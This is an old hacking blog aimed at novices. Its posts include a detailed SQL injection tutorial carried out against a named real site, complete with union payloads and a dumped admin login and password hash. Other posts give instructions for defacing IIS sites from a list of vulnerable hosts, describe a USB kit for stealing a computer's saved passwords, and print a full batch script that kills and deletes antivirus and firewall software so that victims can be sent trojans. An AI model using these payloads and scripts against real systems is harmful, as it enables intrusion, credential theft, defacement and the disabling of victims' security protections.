Pages

Subscribe:

Friday, April 27, 2012

Admin Finder Tool Download

Hello readers, you may need admin panel of a website to deface this. There are many admin finder tools in online. But all are not good. Today I share with you an admin finder tool which is written by perl. I also give you the video tutorial of the tool. after extract the downloaded file you get the video tutorial with the admin finder tool.
 

 
If you like this post leave a comment.

read more "Admin Finder Tool Download"

Friday, April 20, 2012

SQL Injection Full Tutorial With Pic [Highly Detailed] [n00b friendly]

SQL Injection Tutorial:

  1. Finding vulnerable sites
  2. Finding amount of columns
  3. Getting mysql version
  4. Getting Databases
  5. Getting Tables
  6. Getting Columns
  7. Getting Usernames and Passwords

1. Finding vulnerable sites

To find vulnerable sites we used google dork. Some of google dorks are:

  • inurl:index.php?id=
  • inurl:news.php?id=
  • inurl:gallery.php?id=
  • inurl:category.php?id=
  • inurl:games.php?id=
  • inurl:forum.php?tid=
  • inurl:newsletter.php?id=
  • inurl:content.php?id=
  You can find the largest collection of google dorks from here.


So as an example I find vulnerable site that is
http://www.geotunis.org/index_en.php?id=7


I know about vulnerability by using string ('). At the last of url use ' and if you got a error then it is vulnerable. In many sites don't show error but some text or image are missing. This kind of sites are also vulnerable.






For sql injection we use a add-on which is very helpful to hacker.
Download it from https://addons.mozilla.org/en-US/firefox/addon/hackbar/






2. Finding Amount of Columns
 To find the right number of column we are using "order by". After the url type 'order by 5' and see the page.
Here I do 
www.geotunis.org/index_en.php?id=7 order by 5--

It seems that the page load normally and there are no error. That means columns are more than 5.
Again try
www.geotunis.org/index_en.php?id=7 order by 10--
It's showing error. That means columns number is less than 10.
By this try for finding columns number.
www.geotunis.org/index_en.php?id=7 order by 6-- [no error]
www.geotunis.org/index_en.php?id=7 order by 7-- [no error]
www.geotunis.org/index_en.php?id=7 order by 8-- [no error]
www.geotunis.org/index_en.php?id=7 order by 9-- [error]
So total column number is 8.

Now we find vulnerable column. To do this please folow me:
www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,4,5,6,7,8--
After id= please insert [-] and it means null.
We got the vulnerable column is 4.


3. Getting Mysql Version
Now we wanna know the MySQL version. If its over 5 then its injectable by this Tut. (if its under 4 then you have to guess tables and columns).
www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,@@version,5,6,7,8--
In the vulnerable column we use @@version instead of column number.
ok we find it.


4. Getting Databases
Now we wanna find the databases and the Current database.
Here the syntax for all databases:

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(schema_name),5,6,7,8 from information_schema.schemata--

And it displays like this:

Now wel would like to now what is the current database, it's pretty obvious in this case but usefull sometimes.

Syntax for current database:
www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,database(),5,6,7,8 from information_schema.schemata--
This should display something like this:

5. Getting Tables
Now we want to know the tables on in the database and for this we will conintue using "union select".

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()--

It's output look like this:
Here admin table is 'utilisateurs'. In maximum sites tables are admin, users, administrator etc.


6. Getting Columns
Now we want to know the columns.
We will use following code:

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_schema=database()--

We got column and it looks like:

7. Dumping users/pass

Now you would like to dump logins and passwords.

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(login,0x3a,pass,0x3a),5,6,7,8 from utilisateurs--

Now we got admin login and password.

Here login: atign and pass: 720a7e98c63c155ae17b0e7d3ce10a09
The pass is md5hash. You can decrypt this hash from www.md5hacker.com

Thanks. If you are helpful by this tutorial please leave a comment and give us review in alexa.
read more "SQL Injection Full Tutorial With Pic [Highly Detailed] [n00b friendly]"

Friday, April 13, 2012

Sqli Google Dork Scanner Tool SQL Poizon Download

Sql poizon tool includes php, asp, rfi, lfi dorks. You can scan site by google dorks. And fix vulnerable sites. This software allows you to scan site based on country. After scan site you can crawl sites for checking vulnerability. You also can inject by this tools. Lets see screenshot of this tool:






Download Link:






read more "Sqli Google Dork Scanner Tool SQL Poizon Download"

Friday, April 6, 2012

IIS Full Hacking Tutorial + 15000+ Vulnerable Sites List

IIS is one of the easiest hacking tutorial. Basically it is for n00b hackers. Today I will give you the full tutorial of IIS exploits. I will show you how to hack by IIS in windows 7. Not for windows xp. So let's start.

First of all go to my computer and then click on 'Add a network location' from right button of mouse.

You will see a pic like below:

Then click next. And select 'Choose a custom network location'.
Now click next. Select a site from the vulnerable sites list. I select http://www.lsqqby.cn/

 Click on next. If the site vulnerable then show you like below.

Simply click next.

Now click on finish. A new window will be shown.

Now copy and paste your deface page in this folder.


See your hacking page from www.examplesite.com/deface.html
in the name of deface.html write your deface page name and extension. If your deface page name is 'hacked' then write 'hacked.html'


Demo: http://www.lsqqby.cn/dr.10c41h05t.html

Download 15000+ IIS vulnerable websites.

***All websites may not be vulnerable. If you show error or can't paste your deface page then try in another site***
read more "IIS Full Hacking Tutorial + 15000+ Vulnerable Sites List"

Wednesday, April 4, 2012

Hack Pc: Hack All Passwords Of a computer with Pen drive/Memory card

You can steal all saved passwords from a pc with pen drive/memory card. It's quiet easy process. But don't try it for harm.

Download the file and unzip. You have got 6 files. Paste this 6 files in your pen drive/memory card. Then input the pen drive in the computer and if the computer have auto run then you need nothing to do. But if auto run is off in that computer just open your pen drive secretly. Click on Launch file. Your work have done. Now insert the pen drive in your pc and open it. You find their 4 text file which is WebBrowserPassView, pspv, mspass and mailpv. Now open it with notepad. You find the passwords of that pc.


 


Password: allitemz.blogspot.com




read more "Hack Pc: Hack All Passwords Of a computer with Pen drive/Memory card"

Tuesday, April 3, 2012

Hack Antivirus: Disable Victim's Antivirus Using Batch File

You can disable victim's antivirus using batch file. This is quiet easy. It is necessary if you send someone trojan. Because anti virus can't run trojan. So before send trojan, send this batch file for disable anti virus.

Open the Notepad and paste the code below:


@ echo off
rem –
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem –



Now save this file as allitemz.bat
Select save type as all files.

Now send it to the victim.. Happy Hacking..
read more "Hack Antivirus: Disable Victim's Antivirus Using Batch File"
Related Posts Plugin for WordPress, Blogger...
 

Alexa Rank

Review www.allitemz.blogspot.com on alexa.com

Total Pageviews

Your IP

what is my ip address?
back to top